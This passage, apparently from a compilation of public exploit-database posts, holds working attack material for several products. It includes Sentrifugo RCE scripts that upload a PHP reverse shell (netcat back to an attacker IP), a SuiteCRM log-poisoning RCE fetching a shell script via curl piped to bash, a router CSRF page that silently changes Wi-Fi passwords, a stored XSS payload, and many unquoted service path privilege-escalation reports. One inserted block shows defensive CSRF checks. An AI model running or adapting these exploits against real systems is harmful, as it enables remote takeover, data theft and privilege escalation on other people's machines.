         # Sent as a raw string so the payload is not URL-encoded
         body = 'action=sauvePass&unox={}&user0=&pass0=&user=&pass=&lang={}'.format(unox, payload)
         session.post(vulnerable_url, data=body, headers=header)
         # Read the next unox token from the page's script block
         request = session.get(login_url)
         text = request.text
         soup = BeautifulSoup(text, "lxml")
         script = soup.findAll('script')[1].string
         data = script.split("Unox='")[1]
         unox = data.split("',")[0]
  9. # Exploit Title: Sentrifugo Version 3.2 - 'announcements' Remote Code Execution (Authenticated)
     # Google Dork: N/A
     # Date: 2020.10.06
     # Exploit Author: Fatih Çelik
     # Vendor Homepage: https://sourceforge.net/projects/sentrifugo/
     # Software Link: https://sourceforge.net/projects/sentrifugo/
     # Blog: https://fatihhcelik.blogspot.com/2020/10/sentrifugo-version-32-rce-authenticated.html
     # Version: 3.2
     # Tested on: Kali Linux 2020.2
     # CVE : N/A

     import requests
     from ast import literal_eval

     '''
     You should change the below hardcoded inputs to get a reverse shell.
     '''
     login_url = "http://XXX.XXX.XXX.XXX/sentrifugo/index.php/index/loginpopupsave"
     upload_url = "http://XXX.XXX.XXX.XXX/sentrifugo/index.php/announcements/uploadsave"
     call_shell = "http://XXX.XXX.XXX.XXX/sentrifugo/public/uploads/ca_temp/"
     username = "xxx"
     password = "xxx"
     attacker_ip = "XXX.XXX.XXX.XXX"
     listener_port = "4444"

     # Set proxy for debugging purposes
     proxy = {"http": "http://XXX.XXX.XXX.XXX:8080"}

     # Log in to the system
     session = requests.Session()
     request = session.get(login_url)
     body = {"username": username, "password": password}
     # session.post(login_url, data=body, proxies=proxy)
     session.post(login_url, data=body)  # Send a request without proxy
     print("Logged in to the application..")

     # Upload the PHP shell (declared as image/jpeg; only the MIME type is checked, not the content)
     files = [
         ('myfile', ('shell.php', '<?php system(\'nc.traditional {} {} -e /bin/bash\'); ?>'.format(attacker_ip, listener_port), 'image/jpeg'))
     ]
     # r = session.post(upload_url, files=files, proxies=proxy)
     r = session.post(upload_url, files=files)  # Send a request without proxy
     response = r.content
     dict_str = response.decode("UTF-8")
     response = literal_eval(dict_str)  # Convert bytes to dictionary
     filename = response["filedata"]["new_name"]
     url = call_shell + filename
     print("PHP file is uploaded --> {}".format(url))

     # Trigger the shell
     session.get(url)
  10. # Exploit Title: Sentrifugo 3.2 - 'assets' Remote Code Execution (Authenticated)
      # Google Dork: N/A
      # Date: 2020.10.06
      # Exploit Author: Fatih Çelik
      # Vendor Homepage: https://sourceforge.net/projects/sentrifugo/
      # Software Link: https://sourceforge.net/projects/sentrifugo/
      # Blog: https://fatihhcelik.blogspot.com/2020/10/sentrifugo-version-32-rce-authenticated_6.html
      # Version: 3.2
      # Tested on: Kali Linux 2020.2
      # CVE : N/A

      import requests
      from ast import literal_eval

      '''
      You should change the below hardcoded inputs to get a reverse shell.
      '''
      login_url = "http://XXX.XXX.XXX.XXX/sentrifugo/index.php/index/loginpopupsave"
      upload_url = "http://XXX.XXX.XXX.XXX/sentrifugo/index.php/assets/assets/uploadsave"
      call_shell = "http://XXX.XXX.XXX.XXX/sentrifugo/public/uploads/assets_images_temp/"
      username = "xxxx"
      password = "xxxx"
      attacker_ip = "XXX.XXX.XXX.XXX"
      listener_port = "4444"

      # Set proxy for debugging purposes
      proxy = {"http": "http://XXX.XXX.XXX.XXX:8080"}

      # Log in to the system
      session = requests.Session()
      request = session.get(login_url)
      body = {"username": username, "password": password}
      # session.post(login_url, data=body, proxies=proxy)
      session.post(login_url, data=body)  # Send a request without proxy
      print("Logged in to the application..")

      # Upload the PHP shell (declared as image/jpeg; only the MIME type is checked, not the content)
      files = [
          ('myfile', ('shell.php', '<?php system(\'nc.traditional {} {} -e /bin/bash\'); ?>'.format(attacker_ip, listener_port), 'image/jpeg'))
      ]
      # r = session.post(upload_url, files=files, proxies=proxy)
      r = session.post(upload_url, files=files)  # Send a request without proxy
      response = r.content
      dict_str = response.decode("UTF-8")
      response = literal_eval(dict_str)  # Convert bytes to dictionary
      filename = response["filedata"]["new_name"]
      url = call_shell + filename
      print("PHP file is uploaded --> {}".format(url))

      # Trigger the shell
      session.get(url)
  11. # Exploit Title: Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF
      # Date: 28-08-2020
      # Vendor Homepage: https://www.gxgroup.eu/ont-products/
      # Exploit Author: Jinson Varghese Behanan (@JinsonCyberSec)
      # Author Advisory: https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/
      # Version: v2.1 (software version P4410-V2-1.28)
      # CVE : CVE-2020-25015

      1. Description

      Platinum 4410 is a compact router from Genexis that is commonly used at homes and
      offices. Hardware version V2.1 – Software version P4410-V2-1.28 was found to be
      vulnerable to Broken Access Control and CSRF which could be combined to remotely
      change the WIFI access point's password.

      2. Impact

      An attacker can send the victim a link, which if he clicks while he is connected to
      the WiFi network established from the vulnerable router, the password of the WIFI
      access point will get changed via CSRF exploit. As the router is also vulnerable
      to Broken Access Control, the victim does not need to be logged in to the router's
      web-based setup page (192.168.1.1), essentially making this a one-click hack.

      3. Proof of Concept

      Create an HTML file with the following code:

      <html>
        <body>
          <script>history.pushState('', '', '/')</script>
          <form action="http://192.168.1.1/cgi-bin/net-wlan.asp" method="POST">
            <input type="hidden" name="wlEnbl" value="ON" />
            <input type="hidden" name="hwlKeys0" value="" />
            <input type="hidden" name="hwlKeys1" value="" />
            <input type="hidden" name="hwlKeys2" value="" />
            <input type="hidden" name="hwlKeys3" value="" />
            <input type="hidden" name="hwlgMode" value="9" />
            <input type="hidden" name="hwlAuthMode" value="WPAPSKWPA2PSK" />
            <input type="hidden" name="hwlEnbl" value="1" />
            <input type="hidden" name="hWPSMode" value="1" />
            <input type="hidden" name="henableSsid" value="1" />
            <input type="hidden" name="hwlHide" value="0" />
            <input type="hidden" name="isInWPSing" value="0" />
            <input type="hidden" name="WpsConfModeAll" value="7" />
            <input type="hidden" name="WpsConfModeNone" value="0" />
            <input type="hidden" name="hWpsStart" value="0" />
            <input type="hidden" name="isCUCSupport" value="0" />
            <input type="hidden" name="SSIDPre" value="N&#47;A" />
            <input type="hidden" name="bwControlhidden" value="0" />
            <input type="hidden" name="ht&#95;bw" value="1" />
            <input type="hidden" name="wlgMode" value="b&#44;g&#44;n" />
            <input type="hidden" name="wlChannel" value="0" />
            <input type="hidden" name="wlTxPwr" value="1" />
            <input type="hidden" name="wlSsidIdx" value="0" />
            <input type="hidden" name="SSID&#95;Flag" value="0" />
            <input type="hidden" name="wlSsid" value="JINSON" />
            <input type="hidden" name="wlMcs" value="33" />
            <input type="hidden" name="bwControl" value="1" />
            <input type="hidden" name="giControl" value="1" />
            <input type="hidden" name="enableSsid" value="on" />
            <input type="hidden" name="wlAssociateNum" value="32" />
            <input type="hidden" name="wlSecurMode" value="WPAand11i" />
            <input type="hidden" name="wlPreauth" value="off" />
            <input type="hidden" name="wlNetReauth" value="1" />
            <input type="hidden" name="wlWpaPsk" value="NEWPASSWORD" />
            <input type="hidden" name="cb&#95;enablshowpsw" value="on" />
            <input type="hidden" name="wlWpaGtkRekey" value="" />
            <input type="hidden" name="wlRadiusIPAddr" value="" />
            <input type="hidden" name="wlRadiusPort" value="" />
            <input type="hidden" name="wlRadiusKey" value="" />
            <input type="hidden" name="wlWpa" value="TKIPAES" />
            <input type="hidden" name="wlKeyBit" value="64" />
            <input type="hidden" name="wlKeys" value="" />
            <input type="hidden" name="wlKeys" value="" />
            <input type="hidden" name="wlKeys" value="" />
            <input type="hidden" name="wlKeys" value="" />
            <input type="hidden" name="WpsActive" value="0" />
            <input type="hidden" name="wpsmode" value="ap&#45;pbc" />
            <input type="hidden" name="pinvalue" value="" />
            <input type="hidden" name="Save&#95;Flag" value="1" />
            <input type="submit" value="Submit request" />
          </form>
          <script>
            document.forms[0].submit();
          </script>
        </body>
      </html>

      Open this file in a browser while you are connected to the WIFI. There is no need
      for the victim to be logged in to the Router admin panel (192.168.1.1). It can be
      seen that the WIFI connection is dropped. To reconnect, forget the WIFI connection
      on your laptop or phone and connect using the newly changed password: NEWPASSWORD

      4. PoC Video: https://www.youtube.com/watch?v=nSu5ANDH2Rk&feature=emb_title

      5. Timeline

      Vulnerability reported to the Genexis team – August 28, 2020
      Team confirmed firmware release containing fix – September 14, 2020
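Both this Genexis PoC and the iDS6 user!addUser form in post 1 work for the same reason: the handler accepts any POST carrying the right field names, with no check of where the request came from or whether the caller holds a token the attacker's page cannot read. The block below is an added example, not code from either advisory or vendor: it applies the three checks such a handler needs (an authenticated session, an Origin/Referer that belongs to the device, and a per-session synchronizer token) to constructed requests shaped like the two PoCs. The Request/Session types, the csrf_token field name and the allowed host list are assumptions of the example; the URLs and form fields come from the two posts.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Hosts the admin UI is legitimately served from (the two PoC targets above); an assumption of this example.
ALLOWED_HOSTS = {"192.168.1.1", "192.168.1.88"}


@dataclass
class Request:
    method: str
    url: str
    headers: dict
    form: dict


@dataclass
class Session:
    """An authenticated session; the token is minted once per session, not per request."""
    user: str
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(32))


def origin_ok(req: Request) -> bool:
    """Browsers set Origin on cross-site form POSTs and a page cannot forge it.
    Fall back to Referer; with neither present, fail closed (a design choice)."""
    src = req.headers.get("Origin") or req.headers.get("Referer")
    if not src:
        return False
    return urlsplit(src).hostname in ALLOWED_HOSTS


def token_ok(req: Request, session: Session) -> bool:
    """Synchronizer token: a per-session secret the attacker's page cannot read (same-origin policy)."""
    sent = req.form.get("csrf_token", "")
    return hmac.compare_digest(sent, session.csrf_token)


def accept_state_change(req: Request, session) -> str:
    """Return 'ok' or the reason the request was refused, in the order the checks should run."""
    if req.method != "POST":
        return "method"
    if session is None:
        return "unauthenticated"   # the Genexis endpoint was reachable with no login at all
    if not origin_ok(req):
        return "origin"
    if not token_ok(req, session):
        return "token"
    return "ok"


def demo() -> dict:
    """Constructed requests: the two PoCs as a browser would send them, plus two same-origin ones."""
    session = Session(user="admin")
    genexis_poc = Request("POST", "http://192.168.1.1/cgi-bin/net-wlan.asp",
                          {"Origin": "http://attacker.example", "Referer": "http://attacker.example/poc.html"},
                          {"wlSsid": "JINSON", "wlWpaPsk": "NEWPASSWORD", "Save_Flag": "1"})
    ids6_poc = Request("POST", "http://192.168.1.88/Pages/user!addUser",
                       {"Origin": "http://attacker.example"},
                       {"user.userName": "testingus", "user.password": "zeroscience"})
    same_origin_no_token = Request("POST",
                                   "http://192.168.1.1/cgi-bin/net-wlan.asp",
                                   {"Origin": "http://192.168.1.1"},
                                   {"wlWpaPsk": "NEWPASSWORD"})
    legitimate = Request("POST", "http://192.168.1.1/cgi-bin/net-wlan.asp",
                         {"Origin": "http://192.168.1.1"},
                         {"wlWpaPsk": "NEWPASSWORD", "csrf_token": session.csrf_token})
    return {
        "genexis_poc_unauthenticated": accept_state_change(genexis_poc, None),
        "genexis_poc_logged_in": accept_state_change(genexis_poc, session),
        "ids6_poc_logged_in": accept_state_change(ids6_poc, session),
        "same_origin_no_token": accept_state_change(same_origin_no_token, session),
        "legitimate": accept_state_change(legitimate, session),
    }


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:30s} {verdict}")
```

The token check alone would already stop both PoCs; the origin check is the cheap second layer for the case where a token leaks, and marking the session cookie SameSite=Lax keeps the browser from attaching it to the cross-site POST in the first place.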
  12. # Exploit Title: BlogEngine 3.3.8 - 'Content' Stored XSS
      # Date: 11/2020
      # Exploit Author: Andrey Stoykov
      # Vendor Homepage: https://blogengine.io/
      # Software Link: https://github.com/BlogEngine/BlogEngine.NET/releases/download/v3.3.8.0/3380.zip
      # Version: 3.3.8
      # Tested on: Windows Server 2016
      # Exploit and Detailed Info: https://infosecresearchlab.blogspot.com/2020/11/blogengine-338-stored-xss.html

      Stored XSS Reproduction Steps:

      1. Login http://IP/blogengine/admin/app/editor/editpost.cshtml
      2. Add content and trap POST request into intercepting proxy
      3. Add the XSS payload into the "Content" parameter value
      4. Browse to the post to trigger the XSS payload

      Example HTTP POST Request:

      POST /blogengine/api/posts HTTP/1.1
      Host: 192.168.56.6
      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
      [..]

      {
        "Id": "",
        "Title": "XSS Test",
        "Author": "Admin",
        "Content": "<img src=x onerror=alert(`XSS`)>",
        [..]
      }

      Example HTTP Response:

      HTTP/1.1 201 Created
      Cache-Control: no-cache
      [..]

      {
        "IsChecked": false,
        "Id": "357ae13d-f230-486a-b2aa-71d67a700083",
        "Title": "XSS Test",
        "Author": "Admin",
        "Description": "",
        "Content": "<img src=x onerror=alert(`XSS`)>",
        [..]
      }
13. # Exploit Title: HP Display Assistant x64 Edition 3.20 - 'DTSRVC' Unquoted Service Path
# Date: 2020-11-08
# Exploit Author: Julio Aviña
# Vendor Homepage: https://www.portrait.com/
# Software Link: https://www.portrait.com/dtune/hwp/enu/
# Software Version: 3.20
# File Version: 1.0.0.1
# Tested on: Windows 10 Pro x64 es
# Vulnerability Type: Unquoted Service Path

# 1. To find the unquoted service path vulnerability

C:\>wmic service where 'name like "%DTSRVC%"' get name, displayname, pathname, startmode, startname

DisplayName                             Name    PathName                                                                  StartMode  StartName
Portrait Displays Display Tune Service  DTSRVC  C:\Program Files (x86)\Common Files\Portrait Displays\Shared\dtsrvc.exe  Auto       LocalSystem

# 2. To check service info:

C:\>sc qc "DTSRVC"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: DTSRVC
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Common Files\Portrait Displays\Shared\dtsrvc.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Portrait Displays Display Tune Service
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem

# 3. Exploit:

A successful attempt to exploit this vulnerability requires the attacker to insert an executable file into the service path undetected by the OS or some security application. When restarting the service or the system, the inserted executable will run with elevated privileges.
14. # Exploit Title: SuiteCRM 7.11.15 - 'last_name' Remote Code Execution (Authenticated)
# Date: 08 NOV 2020
# Exploit Author: M. Cory Billington (@_th3y)
# Vendor Homepage: https://suitecrm.com/
# Software Link: https://github.com/salesagility/SuiteCRM
# Version: 7.11.15 and below
# Tested on: Ubuntu 20.04 LTS
# CVE: CVE-2020-28328
# Writeup: https://github.com/mcorybillington/SuiteCRM-RCE

from requests import Session
from random import choice
from string import ascii_lowercase

url = "http://127.0.0.1/"  # URL to remote host web root
post_url = "{url}index.php".format(url=url)
user_name = "admin"  # User must be an administrator
password = "admin"

prefix = 'shell-'
file_name = '{prefix}{rand}.php'.format(
    prefix=prefix,
    rand=''.join(choice(ascii_lowercase) for _ in range(6))
)

# *Recommend K.I.S.S as some characters are escaped*
# Example for reverse shell:
# Put 'bash -c '(bash -i >& /dev/tcp/127.0.0.1/8080 0>&1)&' inside a file named shell.sh
# Stand up a python web server `python -m http.server 80` hosting shell.sh
# Set a nc listener to catch the shell 'nc -nlvp 8080'
command = '<?php `curl -s http://127.0.0.1/shell.sh | bash`; ?>'.format(fname=file_name)

# Admin login payload
login_data = {
    "module": "Users",
    "action": "Authenticate",
    "return_module": "Users",
    "return_action": "Login",
    "user_name": user_name,
    "username_password": password,
    "Login": "Log+In"
}

# Payload to set logging to 'info' and create a log file in php format.
modify_system_settings_data = {
    "action": (None, "SaveConfig"),
    "module": (None, "Configurator"),
    "logger_file_name": (None, file_name),  # Set file extension in the file name as it isn't checked here
    "logger_file_ext": (None, ''),  # Bypasses file extension check by just not setting one.
    "logger_level": (None, "info"),  # This is important for your php code to make it into the logs
    "save": (None, "Save")
}

# Payload to put php code into the malicious log file
poison_log = {
    "module": (None, "Users"),
    "record": (None, "1"),
    "action": (None, "Save"),
    "page": (None, "EditView"),
    "return_action": (None, "DetailView"),
    "user_name": (None, user_name),
    "last_name": (None, command),
}

# Payload to restore the log file settings to default after the exploit runs
restore_log = {
    "action": (None, "SaveConfig"),
    "module": (None, "Configurator"),
    "logger_file_name": (None, "suitecrm"),  # Default log file name
    "logger_file_ext": (None, ".log"),  # Default log file extension
    "logger_level": (None, "fatal"),  # Default log file setting
    "save": (None, "Save")
}

# Start of exploit
with Session() as s:
    # Authenticating as the administrator
    s.get(post_url, params={'module': 'Users', 'action': 'Login'})
    print('[+] Got initial PHPSESSID:', s.cookies.get_dict()['PHPSESSID'])
    s.post(post_url, data=login_data)
    if 'ck_login_id_20' not in s.cookies.get_dict().keys():
        print('[-] Invalid password for: {user}'.format(user=user_name))
        exit(1)
    print('[+] Authenticated as: {user}. PHPSESSID: {cookie}'.format(
        user=user_name,
        cookie=s.cookies.get_dict()['PHPSESSID'])
    )

    # Modify the system settings to set logging to 'info' and create a log file in php format
    print('[+] Modifying log level and log file name.')
    print('[+] File name will be: {fname}'.format(fname=file_name))
    settings_header = {'Referer': '{url}?module=Configurator&action=EditView'.format(url=url)}
    s.post(post_url, headers=settings_header, files=modify_system_settings_data)

    # Post to update the administrator's last name with php code that will poison the log file
    print('[+] Poisoning log file with php code: {cmd}'.format(cmd=command))
    command_header = {'Referer': '{url}?module=Configurator&action=EditView'.format(url=url)}
    s.post(url, headers=command_header, files=poison_log)

    # May be a good idea to put a short delay in here to allow your code to make it into the logfile.
    # Up to you though...

    # Do a get request to trigger php code execution.
    print('[+] Executing code. Sending GET request to: {url}{fname}'.format(url=url, fname=file_name))
    execute_command = s.get('{url}/{fname}'.format(url=url, fname=file_name), timeout=1)
    if not execute_command.ok:
        print('[-] Exploit failed, sorry... Might have to do some modifications.')

    # Restoring log file to default
    print('[+] Setting log back to defaults')
    s.post(post_url, headers=settings_header, files=restore_log)
    print('[+] Done. Clean up {fname} if you care...'.format(fname=file_name))
15. #Exploit Title: Winstep 18.06.0096 - 'Xtreme Service' Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2020-11-08
#Vendor : Winstep
#Version : WsxService 18.06.0096
#Vendor Homepage : https://www.winstep.net/xtreme.asp
#Tested on OS: Windows 7 Pro

#Analyze PoC :
==============

C:\>sc qc "Winstep Xtreme Service"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: Winstep Xtreme Service
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\Winstep\WsxService
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Winstep Xtreme Service
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem
16. #Exploit Title: KMSpico 17.1.0.0 - 'Service KMSELDI' Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2020-11-08
#Vendor : KMSpico
#Version : Service_KMS 17.1.0.0
#Vendor Homepage : https://official-kmspico.com/
#Tested on OS: Windows 7 Pro

#Analyze PoC :
==============

C:\>sc qc "Service KMSELDI"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: Service KMSELDI
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\KMSpico\Service_KMS.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Service KMSELDI
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem
17. # Exploit Title: OKI sPSV Port Manager 1.0.41 - 'sPSVOpLclSrv' Unquoted Service Path
# Date: 2020-11-08
# Exploit Author: Julio Aviña
# Vendor Homepage: https://www.oki.com/
# Software Link: https://www.oki.com/mx/printing/download/sPSV_010041_2_270910.exe
# Software Version: 1.0.41
# File Version: 1.4.2.0
# Tested on: Windows 10 Pro x64 es
# Vulnerability Type: Unquoted Service Path

# 1. To find the unquoted service path vulnerability

C:\>wmic service where 'name like "%sPSVOpLclSrv%"' get displayname, pathname, startmode, startname

DisplayName            PathName                                                                                 StartMode  StartName
OKI sPSV Port Manager  C:\Program Files\Okidata\smart PrintSuperVision\xml\ComApi\extend3\portmgrsrv.exe  Auto       LocalSystem

# 2. To check service info:

C:\>sc qc "sPSVOpLclSrv"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: sPSVOpLclSrv
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\Okidata\smart PrintSuperVision\xml\ComApi\extend3\portmgrsrv.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : OKI sPSV Port Manager
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem

# 3. Exploit:

A successful attempt to exploit this vulnerability requires the attacker to insert an executable file into the service path undetected by the OS or some security application. When restarting the service or the system, the inserted executable will run with elevated privileges.
18. #Exploit Title: IPTInstaller 4.0.9 - 'PassThru Service' Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2020-11-08
#Vendor : HTC
#Version : IPTInstaller 4.0.9
#Vendor Homepage : https://www.htc.com/latam/
#Tested on OS: Windows 7 Pro

#Analyze PoC :
==============

C:\Users\DSAZ230>sc qc "PassThru Service"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: PassThru Service
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Internet Pass-Through Service
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem
19. #Exploit Title: DigitalPersona 4.5.0.2213 - 'DpHostW' Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2020-11-08
#Vendor : DigitalPersona U. are U. One Touch
#Version : DigitalPersona Pro 4.5.0.2213
#Vendor Homepage : https://www.hidglobal.com/crossmatch
#Tested on OS: Windows 10 Home

#Analyze PoC :
==============

C:\>sc qc DpHost
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: DpHost
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\DigitalPersona\Bin\DpHostW.exe
        GRUPO_ORDEN_CARGA  : BiometricGroup
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Servicio de autenticación biométrica
        DEPENDENCIAS       : RPCSS
        NOMBRE_INICIO_SERVICIO: LocalSystem
20. #Exploit Title: Genexus Protection Server 9.6.4.2 - 'protsrvservice' Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2020-11-08
#Vendor : Genexus
#Version : Genexus Protection Server 9.6.4.2
#Software Link: https://www.genexus.com/en/developers/downloadcenter?data=;;
#Vendor Homepage : https://www.genexus.com/es/
#Tested on OS: Windows 10 Pro

#Analyze PoC :
==============

C:\>sc qc protsrvservice
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: protsrvservice
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Common Files\Artech\GXProt1\ProtSrv.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : ProtSrvService
        DEPENDENCIAS       : RPCSS
        NOMBRE_INICIO_SERVICIO: LocalSystem
21. #Exploit Title: HP WMI Service 1.4.8.0 - 'HPWMISVC.exe' Unquoted Service Path
#Discovery by: Jocelyn Arenas
#Discovery Date: 2020-11-07
#Vendor Homepage: https://www8.hp.com/mx/es/home.html
#Tested Version: 1.4.8.0
#Vulnerability Type: Unquoted Service Path
#Tested on OS: Windows 10 Home x64 es

# Step to discover Unquoted Service Path:

C:\>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\windows\\" | findstr /i /v """

HPWMISVC  HPWMISVC  c:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe  Auto

#Service info:

C:\>sc qc HPWMISVC
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: HPWMISVC
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2    AUTO_START
        ERROR_CONTROL      : 1    NORMAL
        BINARY_PATH_NAME   : c:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : HPWMISVC
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

#Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
22. # Exploit Title: Syncplify.me Server! 5.0.37 - 'SMWebRestServicev5' Unquoted Service Path
# Date: 2020-11-08
# Exploit Author: Julio Aviña
# Vendor Homepage: https://www.syncplify.me/
# Software Link: https://download.syncplify.me/SMServer_Setup.exe
# Version: 5.0.37
# Tested on: Windows 10 Pro x64 es
# Vulnerability Type: Unquoted Service Path

# 1. To find the unquoted service path vulnerability

C:\>wmic service where 'name like "%SMWebRestServicev5%"' get displayname, pathname, startmode, startname

DisplayName                       PathName                                                           StartMode  StartName
Syncplify.me Web/REST Server! v5  C:\Program Files\Syncplify\Syncplify.me Server!\SMWebRestSvc.exe  Auto       LocalSystem

# 2. To check service info:

C:\>sc qc "SMWebRestServicev5"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: SMWebRestServicev5
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\Syncplify\Syncplify.me Server!\SMWebRestSvc.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Syncplify.me Web/REST Server! v5
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem

# 3. Exploit:

A successful attempt to exploit this vulnerability requires the attacker to insert an executable file into the service path undetected by the OS or some security application. When restarting the service or the system, the inserted executable will run with elevated privileges.
23. # Exploit Title: Motorola Device Manager 2.4.5 - 'ForwardDaemon.exe' Unquoted Service Path
# Discovery by: Angel Canseco
# Discovery Date: 2020-11-08
# Vendor Homepage: https://www.filehorse.com/es/descargar-motorola-device-manager/
# Tested Version: 2.4.5
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es

# Step to discover Unquoted Service Path:

C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "PST Service " | findstr /i /v """

Motorola Device Manager  C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe  Auto
PST Service              C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe                      Auto

# Service info:

C:\>sc qc "PST Service"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: PST Service
        TIPO               : 110  WIN32_OWN_PROCESS (interactive)
        TIPO_INICIO        : 2    AUTO_START
        CONTROL_ERROR      : 1    NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : PST Service
        DEPENDENCIAS       : lanmanworkstation
        NOMBRE_INICIO_SERVICIO: LocalSystem

#Exploit:

A successful attempt would cause the local user to be able to insert their code in the system root path undetected by the OS or other security applications and elevate his privileges after reboot.
24. # Exploit Title: Realtek Andrea RT Filters 1.0.64.10 - 'AERTSr64.EXE' Unquoted Service Path
# Discovery by: Erika Figueroa
# Discovery Date: 2020-11-07
# Vendor Homepage: https://www.realtek.com/en/
# Tested Version: 1.0.64.10
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 8.1 x64 es

# Step to discover Unquoted Service Path:

C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "CodeMeter" | findstr /i /v """

Andrea RT Filters Service  AERTFilters  C:\Program Files\Realtek\Audio\HDA\AERTSr64.EXE  Auto

# Service info:

C:\>sc qc "AERTFilters"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: AERTFilters
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\Realtek\Audio\HDA\AERTSr64.EXE
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Andrea RT Filters Service
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem

#Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
25. # Exploit Title: Motorola Device Manager 2.5.4 - 'ForwardDaemon.exe' Unquoted Service Path
# Discovery by: Angel Canseco
# Discovery Date: 2020-11-07
# Vendor Homepage: https://motorola-device-manager.programas-gratis.net/gracias
# Tested Version: 2.5.4
# Vulnerability Type: Unquoted Service Path
